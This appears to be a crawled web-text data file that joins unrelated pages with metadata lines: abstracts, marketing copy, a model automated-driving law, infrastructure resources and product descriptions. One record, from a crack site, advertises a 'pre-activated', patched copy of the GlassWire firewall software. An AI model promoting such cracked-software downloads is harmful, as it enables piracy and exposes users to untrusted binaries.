techniques were used such as: comparison, evaluation/validation, content analysis, experiment, modelling techniques (UML), diagram techniques (causal relationship diagrams), structural analysis of processes (decomposition diagrams, data flow charts, and block diagram), programming (pseudocode and scripting languages (BASH and PHP), as well as many others. With regard to scientific contributions, this research has resulted with a new model for an automated and improved utilization of the existing computing resources without the need to restart the server, as well as in clearly defined cases and constraints regarding the new model’s application. The research has shown that the application of a new model enables a more efficient utilization of the existing computing resources (CPU and memory) without the need to restart the server. The research also provides recommendations for the implementation of the model in the selected programming language, and the process of evaluating the model in the experiments. In view of the social contribution, the whole solution is open source, which is also one of the main goals of this research. This results in an easier application of the solution and the repeatability of the testing to facilitate further improvement and research on this topic.
systems_science
https://orbis.uaslp.mx/vivo/display/scopus9231
2024-03-03T01:56:59
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947476180.67/warc/CC-MAIN-20240303011622-20240303041622-00494.warc.gz
0.927029
335
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__70045113
en
Photomechanical polymer nanocomposites for drug delivery devices - Additional Document Info - View All We demonstrate a novel structure based on smart carbon nanocomposites intended for fabricating laser-triggered drug delivery devices (DDDs). The performance of the devices relies on nanocomposites’ photothermal effects that are based on polydimethylsiloxane (PDMS) with carbon nanoparticles (CNPs). Upon evaluating the main features of the nanocomposites through physicochemical and photomechanical characterizations, we identified the main photomechanical features to be considered for selecting a nanocomposite for the DDDs. The capabilities of the PDMS/CNPs prototypes for drug delivery were tested using rhodamine-B (Rh-B) as a marker solution, allowing for visualizing and quantifying the release of the marker contained within the device. Our results showed that the DDDs readily expel the Rh-B from the reservoir upon laser irradiation and the amount of released Rh-B depends on the exposure time. Additionally, we identified two main Rh-B release mechanisms, the first one is based on the device elastic deformation and the second one is based on bubble generation and its expansion into the device. Both mechanisms were further elucidated through numerical simulations and compared with the experimental results. These promising results demonstrate that an inexpensive nanocomposite such as PDMS/CNPs can serve as a foundation for novel DDDs with spatial and temporal release control through laser irradiation. © 2021 by the authors. Licensee MDPI, Basel, Switzerland. funding provided via
systems_science
http://oakston.com/telecommunications
2023-09-27T07:19:15
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233510284.49/warc/CC-MAIN-20230927071345-20230927101345-00743.warc.gz
0.905009
196
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__220084906
en
OAKSTON Technologies has helped the telecommunications service providers and infrastructure suppliers to gain cost savings, time-to-market efficiency, improved quality and productivity. OAKSTON Technologies provides technology products, solutions and technology consulting services to a wide range of telecommunications service providers and infrastructure providers worldwide. We have combined our telecommunications industry business acumen with our proven global delivery methodology to rapidly and inexpensively deploy state-of-the-art solutions that resolve core business issues for our telecommunications clients. Intelligent Networks (IN) and Next Generation Networks (NGN) OAKSTON Technologies provides a suite of products, customized solutions and systems integration services in the domain of Intelligent Networks (IN) and Next Generation Networks (NGN). Our products and customized solutions are deployed on the Service Control Point (SCP) and Application Server (AS) in the IN and NGN architectures respectively and provide value-added services to subscribers in the wireline, wireless and convergent segments of the telecommunications market.
systems_science
http://areyoufakenews.com/
2022-09-30T11:11:31
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335448.34/warc/CC-MAIN-20220930082656-20220930112656-00760.warc.gz
0.907995
191
CC-MAIN-2022-40
webtext-fineweb__CC-MAIN-2022-40__0__107516155
en
This project aims to classify the bias in news media in real time. With the help of labeled data created by open source projects opensources.co and mediabiasfactcheck.com which document bias in thousands of news sources, a model of what makes a source biased is constructed to classify new information. This project periodically collects tens of thousands of articles from the labeled news sources and trains a custom-built neural network on the articles in order to model and characterize bias. When a user visits this site and submits a news website url for analysis, a system of EC2 instances and AWS Lambda functions gathers a few dozen of the latest articles from the site. The collected text is sent to the neural network model residing in an AWS Lambda function, and the results are rendered in matplotlib and published via flask. This project is under continued development as UX, data visualization and modeling are expanded and refined.
systems_science
https://www.newsminimalist.com/articles/336d42f6-059a-4ce3-9f6c-753e893b94c4
2024-04-13T04:20:16
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816535.76/warc/CC-MAIN-20240413021024-20240413051024-00727.warc.gz
0.873006
114
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__38470922
en
Moon Surgical's Maestro System enhances laparoscopies with ScoPilot Summary: Moon Surgical's Maestro System, powered by NVIDIA's Holoscan, introduces the ScoPilot feature for laparoscopies, enabling surgeons to control the laparoscope independently. Over 200 patients have benefited from this technology, enhancing surgical fluidity and speed. The system's AI capabilities aim to revolutionize the operating room experience, with NVIDIA's platform supporting real-time AI algorithms during surgery. Surgeons and patients stand to benefit from these innovative advancements.
systems_science
https://www.jerseywaterworks.org/tools-resources/effective-green-gray-infrastructure/page/10/
2018-11-17T15:21:27
s3://commoncrawl/crawl-data/CC-MAIN-2018-47/segments/1542039743714.57/warc/CC-MAIN-20181117144031-20181117165402-00037.warc.gz
0.871816
513
CC-MAIN-2018-47
webtext-fineweb__CC-MAIN-2018-47__0__51447866
en
Successful and Beneficial Green Infrastructure Most people are familiar with “gray” water infrastructure — the hard, concrete and metal pipes, holding tanks, pumps, water tunnels, and treatment plants. These systems play a key role in managing drinking water, wastewater and combined-sewer systems. “Green” infrastructure is a newer approach to stormwater management that mimics nature by capturing stormwater so it can either be reused or seep into the ground where it falls, rather than flowing into underground sewer and storm pipes. Methods for stormwater capture include rain gardens, pervious pavement, planted swales, and storage containers such as cisterns and rain barrels. Green-infrastructure features can help reduce stress on water systems and can provide good local jobs, as well as making the communities where they’re installed healthier and more beautiful. Both gray and green infrastructure are important components of water infrastructure systems statewide. Communities with combined sewer systems in particular will be evaluating gray- and green-infrastructure approaches to come up with the best combination that meets regulatory requirements cost-effectively and in a manner that provides tangible community benefits. Historic Water: Re-imaging Hobokens Engineered Landscape This report explores different stormwater interventions within an open-space network that incorporates stormwater infrastructure and the landscape. New Jersey Future. 2013. Hoboken Columbia – IRS Mixed Use Water Infrastructure This report presents potential green and gray infrastructure design strategies developed to determine the appropriate combinations of green and grey infrastructure based upon cost, social impact, and magnitude of desired flood prevention for the City of Hoboken. Spring 2012. Charting New Waters: Developing an Agenda for Change for New Jersey’s Urban Water Infrastructure This report provides The Johnson Foundation at Wingspread’s comprehensive description of the 2014 convening that spawned the Agenda for Change and synthesizes the broader range of information, insights and ideas shared during the convening. 2014. Low Impact Development (LID) As a Solution to the CSO Problem In the NY-NJ Harbor Estuary This policy brief, from NY/NJ Baykeeper, reviews legislation, case studies and technologies to make the case for the use of Low Impact Development practices to reduce stormwater flows in combined sewer systems in municipalities. Hoboken City Hall Sustainable Stormwater Demonstration Project Concept Plan This plan demonstrates how to capture stormwater runoff from Hoboken’s City Hall by using green and gray infrastructure. City of Hoboken. 2013.
systems_science
https://sonarcn.com/software-development-unveiled-decoding-the-digital-universe/
2024-02-28T16:55:19
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474737.17/warc/CC-MAIN-20240228143955-20240228173955-00696.warc.gz
0.906435
461
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__199900926
en
In the fast-paced realm of technology, software development stands as the cornerstone of innovation, orchestrating the transformation of ideas into tangible digital solutions. It is the process of designing, coding, testing, and maintaining software applications, enabling computers to perform tasks that range from simple calculations to complex artificial intelligence algorithms. At its core, software development is a symphony of human creativity, logical thinking, and problem-solving. It encompasses a multitude of programming languages, each with its unique syntax and purpose, providing developers with a diverse toolkit to craft applications tailored to specific needs. Central to custom software development is the iterative process. It begins with conceptualizing the idea, dissecting it into manageable components, and outlining the architecture. Next, developers dive into writing code, a language that computers comprehend, instructing them on how to execute tasks. This is where creativity meets precision, as developers craft algorithms, loops, and conditional statements to breathe life into their concepts. Simultaneously, testing is paramount. Rigorous examination of the code for bugs, glitches, and performance issues ensures a robust, reliable product. This quality assurance phase often involves various methodologies, including unit testing, integration testing, and user acceptance testing. It is a meticulous process, vital for delivering software that meets or exceeds user expectations. Moreover, the digital landscape is ever-evolving, demanding adaptability from developers. Agile methodologies have emerged as a beacon, emphasizing flexibility and collaboration. Teams work in sprints, allowing them to respond swiftly to changing requirements and deliver incremental updates. This iterative approach promotes a dynamic development environment, where feedback loops fuel continuous improvement. The digital universe, as we know it, thrives on a multitude of software ecosystems. From mobile applications that streamline daily life to enterprise-level systems that power global corporations, software development is ubiquitous. It has revolutionized industries, enabling automation, artificial intelligence, and the Internet of Things to reshape the way we live and work. In conclusion, software development is the engine propelling the digital age forward. It marries human ingenuity with computational prowess, birthing applications that empower individuals and organizations alike. As we continue to decode the digital universe, the journey of software development remains an exhilarating exploration of boundless possibilities.
systems_science
https://newlypossible.org/w/index.php?title=Model_State_Automated_Driving_Law&direction=next&oldid=32
2022-01-21T11:19:18
s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320303356.40/warc/CC-MAIN-20220121101528-20220121131528-00661.warc.gz
0.923591
1,733
CC-MAIN-2022-05
webtext-fineweb__CC-MAIN-2022-05__0__211691463
en
Model State Automated Driving Law - It is the intent of the Legislature to facilitate the development and de-ployment of automated driving in a way that improves highway safety. - The Legislature hereby finds that the automated operation of an automated vehicle under the conditions prescribed herein is consistent with article 8 of the Convention on Road Traffic because automated driving systems perform the operational and tactical functions otherwise performed by conventional drivers and have the potential to advance an object of the Convention by significantly improving highway safety. - The Department of Motor Vehicles and the Department of Insurance may make rules, issue interpretations, and take other lawful actions to administer and enforce this Act. - Automated driving provider means the natural or legal person that for the purpose of registering an automated vehicle warrants that the automated operation of such vehicle is reasonably safe. - Automated driving system means the hardware and software that are collectively capable of performing the entire dynamic driving task on a sustained basis. - Automated operation means the performance of the entire dynamic driving task by an automated driving system, a remote driver, or a combination of automated driving system and remote driver. Automated operation begins at the moment of such performance and continues until the moment that a driver or operator intentionally terminates such performance for a reason other than a reasonable perception of imminent harm. - Automated operation insurance means an insurance policy that covers damages to the person or property of another arising from the automated operation of an automated vehicle without regard to fault. - Automated vehicle means a motor vehicle with an automated driving system, regardless of whether the vehicle is under automated operation. - Automated vehicle owner means the owner of the automated vehicle, as the term owner is defined in this Title. - Automation continuation guarantee means a surety bond or cash deposit that specifically covers diminution in the value of an automated vehicle arising from revocation of that vehicle’s registration. - Dedicated automated vehicle means an automated vehicle designed for exclusively automated operation. - Drive and operate each mean as provided in the vehicle code, except that an automated driving system exclusively drives and operates a vehicle under automated operation. - Driver and operator each mean as provided in the vehicle code, except that an automated driving system is the exclusive driver and operator of a vehicle under automated operation. - Dynamic driving task means all of the real-time operational and tactical functions required to operate a vehicle in on-road traffic, excluding the strategic functions such as trip scheduling and selection of destinations and waypoints, and including without limitation controlling lateral vehi-cle motion, controlling longitudinal vehicle motion, monitoring the driv-ing environment, executing responses to objects and events, planning ve-hicle maneuvers, and enhancing vehicle conspicuity. - Participating agency means the Department of Motor Vehicles, an administrative agency of another state that shares automated vehicle registration information with this State, or an administrative agency of the United States that shares automated vehicle registration information with this State. - Remote driver means a natural person who performs part of or the entire dynamic driving task while not seated in a position to manually exercise in-vehicle braking, accelerating, steering, and transmission gear selection input devices. - A person who uses an automated vehicle without driving or operating such vehicle shall not be required to hold a driving license. - A remote driver shall hold a driving license that is valid in this State. - A remote driver who is employed, contracted, or compensated as such shall hold a commercial driving license that is valid in this State. - An automated vehicle owner may register an automated vehicle in this State regardless of whether such owner is a resident thereof. - An automated vehicle owner shall register an automated vehicle in this State if such vehicle travels more than 80 percent of its miles therein as measured on a calendar year basis. - Registration of an automated vehicle may be granted, maintained, and renewed only if, by means of a current electronic record automatically retrievable by any participating agency, an automated driving provider: - identifies such vehicle by vehicle identification number; - describes the capabilities and limitations of such vehicle’s automated driving system; - provides proof of automated operation insurance for such vehicle; - provides proof of any required automation continuation guarantee for such vehicle; - represents to each participating agency that it believes the automated operation of such vehicle to be reasonably safe; - represents to each participating agency that clear and convincing evi-dence supports such belief; - warrants to the public that the automated operation of such vehicle is reasonably safe; and - irrevocably appoints each participating agency as a lawful agent upon whom any process may be served in any action arising from the automated operation of such vehicle. - The Department of Motor Vehicles may decline, suspend, revoke, or de-cline to renew the registration of any motor vehicle that it determines to be unsafe, improperly equipped, insufficiently insured, noncompliant with any vehicle registration requirement, or otherwise unfit to be operat-ed on a highway. - Registration of a motor vehicle shall create no presumption as to the safety of such vehicle or its equipment. - This Title’s vehicle and equipment provisions shall be interpreted to fa-cilitate the development and deployment of automated vehicles in a way that improves highway safety. - An automated vehicle shall be reasonably safe. - An automated driving system shall be reasonably safe. - Any provision of this Title requiring equipment necessary only for the performance of the dynamic driving task by a human driver shall not apply with respect to a dedicated automated vehicle. Rules of the road - This Title’s rules of the road shall be interpreted to facilitate the devel-opment and deployment of automated vehicles in a way that improves highway safety. - Automated operation of an automated vehicle in accordance with this Act and in a reasonably safe manner is lawful. - An automated driving provider shall take reasonable steps to ensure rea-sonable compliance with all provisions of this section while an associated automated vehicle is under automated operation and shall be liable as would a driver or operator in case of noncompliance. - A motor vehicle shall not be operated on a public highway if it is unsafe, improperly equipped, insufficiently insured, noncompliant with any vehi-cle registration requirement, or otherwise unfit for such operation. - An automated vehicle that is under automated operation shall not be deemed unattended unless it is not lawfully registered in this State or an-other, poses a risk to public safety, or unreasonably obstructs other road users. - An automated vehicle that is under automated operation shall not be deemed abandoned unless it is not lawfully registered in this State or an-other, poses a risk to public safety, or unreasonably obstructs other road users. - Any provision of this Title restricting the use of electronic devices by a driver or operator shall not apply to the automated operation of an auto-mated vehicle. - Any provision of this Title requiring a minimum following distance other than a reasonable and prudent distance shall not apply to operation of any nonleading vehicle traveling in a procession of vehicles if the speed of each vehicle is automatically coordinated. - Any natural or legal person who in willful or wanton disregard for the safety of persons or property initiates, continues, or impedes the automated operation of an automated vehicle shall be guilty of reckless driving. - The automated driving provider shall maintain automated operation insurance for each automated vehicle in an amount that is not less than the amount of third party liability insurance specified in this State’s financial responsibility statute. - The automated driving provider shall maintain an automation continuation guarantee for each automated vehicle in an amount that is not less than $10,000, except that this requirement shall not apply if the automated driving provider is also the automated vehicle owner. - This Act does not displace any other insurance requirements. - Unless otherwise provided by this Act or by the laws of this State, a natu-ral or legal person who fails to comply with any provision of this Act shall be liable for a civil infraction and fined not more than $1000 for each day of each violation. - The effective date of this Act shall be 30 days after its enactment. - The provisions of this Act are severable, and a declaration that any part thereof is unconstitutional or otherwise invalid shall not affect the part that remains.
systems_science
https://www.mayainstruments.com/en-US/ves/698/706/728/1072/0/0
2023-10-04T18:56:27
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233511406.34/warc/CC-MAIN-20231004184208-20231004214208-00845.warc.gz
0.890336
364
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__73043063
en
The calorimetric SIKA flow monitors of the VE series are used for monitoring volumetric flows. The flow monitor is easily screwed directly into the process line by means of a connection thread. As the measuring probe is available in two different lengths, a wide range of pipelines with various nominal diameters and wall thicknesses is covered. In the compact version VES, the flow sensor and the associated evaluation electronics form one unit. In this way, the flow can be monitored directly at the measuring point. The calorimetric flow monitor works according to the principle of temperature difference detection. There are two temperature sensors inside the cylindrical measuring probe. They have optimal heat-conducting contact with the medium and at the same time a good thermal insulation to each other. One sensor is heated with constant power, the other is not heated and thus assumes the medium temperature. When the medium is stationary, there will be a constant temperature difference between the two sensors. The heated sensor is cooled by the flowing medium. The changed temperature difference between the two sensors depends on the flow velocity and is therefore a parameter for monitoring the preselected minimum flow. This signal is fed by a comparator controlling a transistor output signal. The output signal is set to the desired flow limit value using a potentiometer. If this value is undercut, the transistor output signal is activated. A 6-digit LED chain indicates the proximity to the set alarm point. » No movable parts in the flow » Setpoint at extremely low flow possible » High compressive strength » Applicable with different nominal diameters » Dry-run protection for pumps » Monitoring of lubrication circuits » Cooling and heating circuits » Leakage monitoring
systems_science
https://vtsmedia.com/streaming/
2023-12-07T20:59:39
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100686.78/warc/CC-MAIN-20231207185656-20231207215656-00818.warc.gz
0.859738
265
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__101320876
en
Adaptive Media Delivery The Adaptive Media Delivery is a solution for streaming that provides a viewing experience by adapting the bit rate (bps) to the best quality of the different networks available, whether they are fixed fiber optic networks or other technologies, and 3G, 4G or 5G mobile networks. Our system securely distributes live and on-demand multimedia content based on HTTP / HTTPS / Web protocol, supporting HTTP Live Streaming, HTTP Dynamic Streaming, Microsoft Smooth Streaming, Dynamic Adaptive Streaming over HTTP and Common Media Application Format. Download Delivery is our high performance and reliable solution for distributing content in the form of files on the Internet, optimized for large files (over 100 MB) and is integrated into our worldwide CDN system to provide reliability, scalability and performance. This service offers a predictable, high-quality download experience as you achieve your online distribution goals, all with clear and easy metrics, plus tools to manage the entire download process. Media Services Live You can now reduce the differences between traditional live broadcasts and live stellar broadcasts thanks to our control system. We have designed our platform to coordinate and deliver the same level of broadcast quality on any digital platform, whether it is a digital native broadcast or an analog converted to digital. Multimedia distribution begins at the edge of the Internet.
systems_science
https://crack4dl.com/glasswire-elite-incl-patch/
2020-09-18T19:34:22
s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600400188841.7/warc/CC-MAIN-20200918190514-20200918220514-00246.warc.gz
0.910481
458
CC-MAIN-2020-40
webtext-fineweb__CC-MAIN-2020-40__0__33230535
en
GlassWire Elite Full Version GlassWire Elite is an efficient and very reliable firewall & monitoring software that allows you to manage and monitor Internet traffic. It is wrapped in a pleasant and easy-to-use user interface, which makes it easier to work with GlassWire. The user interface is designed very nicely to get the appropriate layout for the necessary tools. If any of your computer programs connect to any remote host, it will immediately inform you about that. You can also disconnect this software from the Internet if you don’t want it to connect to the Internet. With this application, you can get the amount of traffic that you use in the 5 Minutes interval, daily, weekly, or monthly. It will also let you know about the amount of consumption with a specific schedule. With its powerful firewall, you can block the different applications with a single click. You can also turn on the warning message for any event or limit messages to the ones which are important to you. With this software, you can display the volume of internal network transactions as well. All in all, this software is very handy, and you should use it if you want to know about Internet traffic. - Simple to use interface to view all your past and present network activity on a graph. - Easy to use tool that can see your past and present network activity. - Keeping track of your daily, weekly, or monthly bandwidth usage. - Detects new RDP connections and will let you know any time an RDP connection occurs. - Get alerted when new WiFi hardware appears nearby with your same network name, and also get alerted if your WiFi network suddenly loses its password. - See a list of devices on the network and get alerted when devices join or leave with our new network device list feature. What’s new in v2.2.201 Elite (Released: May 20, 2020) - GlassWire memory and disk usage resource improvements. - DNS resolving is now improved. - VirusTotal analyze is now faster. - Fixed a medium severity issue reported to our HackerOne bug bounty program about a theoretical filesystem data corruption due to the privileges granted to its service. GlassWire Elite v2.2.201 Pre-Activated
systems_science
http://iaealtd.com/tools/mrt-lab/
2019-11-17T02:11:17
s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496668782.15/warc/CC-MAIN-20191117014405-20191117042405-00281.warc.gz
0.923176
453
CC-MAIN-2019-47
webtext-fineweb__CC-MAIN-2019-47__0__148280491
en
MRT Express Professional DR Tool MRT Ultra Ultimate DR Tool Overview MRT ULTRA MRT Ultra is a new design of MRT Lab launched in 2015 with brand new framework. It is the world’s first PCIE2.0 interface data recovery tool. MRT Ultra is dedicated for high quality, high speed and perfect user experience, which can be classified as high-end configuration among MRT tools. Recently MRT Ultra is released to market, software running platform supports 32-bit and 64-bit Windows operating system. Featured by more ports, more advanced technology, less resource occupancy rate of CPU and hardware design of SATA3.0, there are two main power input, 4 power supply output interfaces, 4 SATA3.0 interfaces and 1 IDE interface. At the same time, there is great enhancement in performance of MRT Ultra. Test firmware transmission speed is raised from 2MByte/s to 33MByte/s. Test DE imaging speed raised to 460MByte/s. Theoretical transmission speed is as high as 600MByte/s. This tool is a good choice for user with mass business volume, professional data recovery company and disk repair institution. There are online full version, offline full version, online repair version and offline repair version software. Overview MRT Express Created by the innovators at Mrtlab, MRT Express is a combination of software and hardware that specializes in both HDD repair and data recovery. Comprised of two parts, the hardware aspect has a special MRT SATA controller card equipped with two SATA ports, which allows two HDDs to be repaired simultaneously, as well as some additional accessories. On the software side, MRT Express has 13 specialized utilities for disk repair and data explore on HDDs from various vendors, architectures and families. Through the advanced hardware and software technology, the repair of HDDs, recovery of firmware can be conducted at factory mode where firmware and microcode is accessible and also user data can be retrieved. MRT Express currently supports HDD families of products from various manufacturers including but not limited to Western Digital, Seagate, Hitachi (including the original series and the newer ARM series), Fujitsu, Samsung and Maxtor.
systems_science
https://olivertechnology.com/author/walker-whiteolivertechnology-com/page/2/
2023-12-09T21:20:12
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100972.58/warc/CC-MAIN-20231209202131-20231209232131-00370.warc.gz
0.927085
1,862
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__148990498
en
The Collections Market is currently experiencing the first credit cycle in the CFPB era. In February 2020, according to the St. Louis Federal Reserve, consumers were expected to default on at least 2.3% of outstanding debt, costing creditors over $325B. However, that prediction was PRIOR to the any impact of the pandemic. If the 2008-2009 recession is any indicator, defaults almost doubled. And many feel we are headed that direction. Creditors, law firms and master servicers are looking at what they need to do today—to keep progressing—while preparing for an inevitable influx of debt collection in the near future. Most collections litigation strategies lack the built-in agility needed to manage the changing dynamics of the market, bringing to light clear failure points in the process. Each time creditors hit a failure point, they leak value out of their strategy, directly impacting their bottom line. Want to get a 360° view from a creditor, lawyer and technology experts on conquering these failure points? Watch our on demand webinar with Heidi Staloch, Vice President and Assistant General Counsel at US Bank , Stefani Jackman, Partner at Ballard Spahr and Walker White, CEO of Oliver Technology. In the meantime, here is a brief review of the five failure points and recommended fixes. Failure #1: The Data is Fractured Antiquated data formats and data collection with limited access across the parties. Creditors system of record comes in many forms. While standards exist, many were designed decades ago and they are not flexible enough to handle dynamic environments like we see today. Additionally, due to the number of sources and systems, these processes raise the risk of inaccurate or incomplete information, either for the Creditor deciding if a particular account is suit-worthy, or for the law firm taking action upon it. We have an opportunity to improve in this area and really modernize. The Fix: A modern, holistic Platform 360° view of data across all relevant parties There are three key categories to fixing a fractured data model. - Consolidation: Bring the data together into a litigation master record visible to all parties; don’t just throw it over the fence. - Automation: Use modern technology to automate many of the tasks you perform manually like loading data, transforming data, cleansing data and even redaction of documents that we want to share with various parties. - Accessible: Using proper permissions, having the ability to share the same data with all interested parties, making it more functional for everyone. Failure #2: Operating on Disparate Platforms Inconsistent, ineffective file management impacts cost and risk Historically, there’s a lot of data and systems involved. Files are tossed over the fence to law firms to operate inside local matter management system and codes are sent back and forth. Matter-specific communication is often relegated to separate emails, texts, and phone calls. It’s inefficient. It also creates potential compliance risks for creditors and law firms, as they are updated about changes after the fact. Any time you lack a master record – a single source of truth – you leak value and efficiency from the process. The Fix: Collaboration and execution in a single streamlined platform Management of all activity by all involved parties within the context of the file. Here are the critical capabilities needed to move from a disparate system to an agile solution: - Collaboration: Create a single place that holds the litigation master record, accessible to all parties all the time, allowing near real-time interaction. - Orchestration: Effectively automate the many handoffs, approvals, and reviews to accelerate the process and capture a standardize audit of the “who, what and where” of each transfer. - Visibility: End-to-end visibility for creditors of the entire channel. Failure #3: Efficiently Maintaining Rigorous Compliance Maintaining compliance requirements has increased the need for more FTEs, while slowing time to revenue. Keeping up with all the federal, state, local and venue specific laws, rules and procedures is a huge cost to manage. Since the formation of the CFPB, the amount of quality control checks and audit requirements have grown exponentially. And currently, there’s just no easy fix. You either hire more people or you slow down the volume. The Fix: A Platform with Compliance Built-in All federal, state, local and venue specific laws plus all regulatory, creditor and law firm rules and procedures are built into one platform and managed across the channel. With the technology that exists today, there’s absolutely no reason we cannot codify these rules. So, let’s start there: - Codify Compliance: Think about Turbo Tax, which codified the tax laws to make it very simple for someone to file taxes. The same is possible with the laws, rules, and procedures that govern collections. - Simplify Audit: Pairing codified compliance with a single system that allows for a comprehensive audit makes rigorous compliance a breeze because each step and timing is documented, including attorney meaningful involvement. - Customization: Compliance is a framework, but there are many paths to maintain it; law firms must maintain the ability to practice the “art of litigation” while preserving a consistent approach from the creditor to the consumer. Failure #4: Litigation Lacks Economy of Scale Individual law firms maintain their own knowledge base making it difficult for creditors to scale within and across states. Since creditors partner with law firms in each state, essential business logic about how to litigate in a given state is distributed and is not accessible to the creditor. This makes it difficult for creditors to develop a consistent process across the channel to achieve an economy of scale. When a creditor can integrate law firms onto one platform using a consistent litigation process all parties realize an economy of scale. Even more, creditors are provided end-to-end visibility and control of the process. The Fix: A Platform with integrated law firm knowledge Integrate law firm knowledge into a consistent litigation process on a shared platform. Let’s look at three ways to fix this problem: - Standardize: allows creditors to capture all data during pre-placement and then share that data based on the needs of the firm and states. - Consolidate: Bring law firms onto a single operational platform or set of processes. - Visibility: Provide dynamic and comprehensive dashboards for creditors to be able to see how those files are moving and either assist the firms to keep them going, or bounce them to another firm that can move the file faster. Failure #5: Stalled Inventory Stalled files equate to lost revenue. When the percentage of stalled files increases, profitability dwindles. Today, inventory is distributed to individual law firms in batches. With limited to no oversight of all files across the channel, inventory can become buried or under-utilized. Each file has many moving parts and inevitably, active files garner the most attention, while higher value files may go unnoticed. The Fix: Automation of Inventory Management Automating inventory is a new solution, in a unique way, to a common problem. Let’s look at three ways to fix this problem: - Actionable views: A consolidated view allows all relevant parties to see which files are active and which are not. By adding actionable and consumable views of inventory, creditors can rely less on people and more on automation to keep files moving. - File Granularity: Workflows should be based on individual files verses pools/batches. A platform should automatically manipulate, test and compare individual matters to determine if the file should be placed and then evaluate multiple variables of data simultaneously to make a data driven decision regarding where to strategically place files. Automatically processing files to the next step is critical to prevent inventory from stalling; yet some files need human interaction, requiring the platform to flag those files and automatically notify the appropriate person that action is needed. - Visibility: Better visualization ensures more inventory will move in a consistent manner to create more value. When a creditor can visualize the value of each file (including the stage each file is in and why files are not advancing) they can proactively address issues like rebalancing load across firms or rebalancing files based on probability of success. Creditors need a comprehensive view of the inventory and an agile platform that can quickly modify the flow of inventory to generate higher value. Think about it. With your business under a microscope of regulators, most creditors are forced to manage their business with caution. While the debt is mounting, the pressure is building. At some point, the storm is going to pass, and the economy will expand. Now is the time to re-tool your collections litigation process into an agile system so you can cost-effectively scale your operation to capture more revenue in a shorter timeframe when the opportunity arises. Learn more with a 360° view from a creditor, lawyer and technology experts on conquering these failures.
systems_science
https://www.ikausa.com/products/dbi-recirculation-solid-liquid-mixer-powder/
2022-09-29T05:05:33
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335304.71/warc/CC-MAIN-20220929034214-20220929064214-00248.warc.gz
0.875484
321
CC-MAIN-2022-40
webtext-fineweb__CC-MAIN-2022-40__0__37993135
en
The high shear mixing and dispersing machine DBI 2000 is suited for batch operations with a recirculating loop and is directly mounted to the vessel bottom. It enables suction, pumping, and self-cleaning under CIP conditions. The dispersing machine DBI 2000 has a patented two-stage design. This allows for it to be mounted onto a production plant in such a manner that the product is transferred through either one or both stages. The first level has a bottom stirrer and a special pump rotor that creates turbulence in the vessel and high circulation capacities, even for highly-viscous products. The second stage of the dispersing machine DBI 2000 is equipped with a rotor-stator system that ensures qualitative homogenizing and tight particle size distribution. The suction of powders or liquids directly into the mixing chamber is possible without an additional vacuum pump. |Max. total flow rate dispersing |Max. total flow rate pumping |max. viscosity final product
systems_science
http://hsysi.com/
2017-04-24T19:10:48
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917119782.43/warc/CC-MAIN-20170423031159-00635-ip-10-145-167-34.ec2.internal.warc.gz
0.954717
748
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__176922305
en
Virtually every business on this planet relies on computers and networks to stay in business. Unfortunately, most of these systems and networks rarely work very well at all. Problems range from the annoying (like a slow PC or minor printing problems) to the catastrophic (server crashes, network failures, virus infections, and lost files). Because most businesses rely so heavily on technology, computer problems are in reality, business problems. Severe enough computer problems can seriously affect your business and drastically impact your bottom line. We specialize in troubleshooting, diagnosing, and fixing any and all computer problems. More importantly, we go further in identifying and preventing many potential problems that may exist in your systems and could cause havoc down the line. We will take an experienced look at how your business uses technology and how this computer power can be levereged and best used to help your business run as efficiently (and profitably) as possible. We have all the computer expertise and experience your business will ever need. Let us handle your technological needs. You are an expert in your business! That is almost certainly the reason that you are in business. The more time you have to devote to your core business, the better it will become. The last thing you need to do is lose any of your very valuable time maintaining and fixing your computer systems. Let our skill and expertise unburden you from the hassle of keeping your systems up and running. We will work closely with you and your employees to make sure your business runs as efficiently as possible. Information Technology represents a substantial and growing investment in most businesses. We will we make sure that you get the most out of the computer and network systems that you currently own. We'll also make sure that any computer equipment you purchase going forward will give you the most bang for your technological buck. If you can dream it, we can build it. From the mundane (software to automatically sort your email) to the esoterically sublime (a remote, computer controlled coffee machine that uses GPS information from your cell phone to determine when you are 15 minutes from your office so it can automatically start making coffee which will be perfect and waiting for you the moment you walk in the door). We can create all that and more. We love to dream up unique and usefull computer systems and solutions almost as much as we love to build them. We can also improve the software and hardware systems you have now by customizing and extending them to better fit your business work flow. In addition we can create brand new, custom software and systems to precisely fill your business needs. We will sit down with you to determine exactly what your needs are and design and build a custom, state of the art computer system to get the job done. Networks keep vital information and communication flowing between the computers in your office and the outside world. Your network as a whole is a very important hardware component of your overall computer system. Like any other high tech piece of equipment, it needs proper maintenance to ensure it runs at optimum speed and with the strongest possible security. When connected to the Internet, your computers and networks are bombarded 24 hours a day by viruses, trojan horses, browser hijackers, phishing attacks, and hackers. It is vitally important to keep your data safe while allowing legitimate electronic traffic to flow in and out. We will review your entire network and critical data paths to ensure your data is secured and flowing as efficiently as possible. We will identify and fix any potential failure points, bottlenecks, and security holes you may have. We can also design, build, and install any kind of data, voice, video, and/or audio network you require or desire.
systems_science
https://www.northeastavionics.co.za/post/portable-navigation-with-a-7-screen
2024-03-01T17:14:59
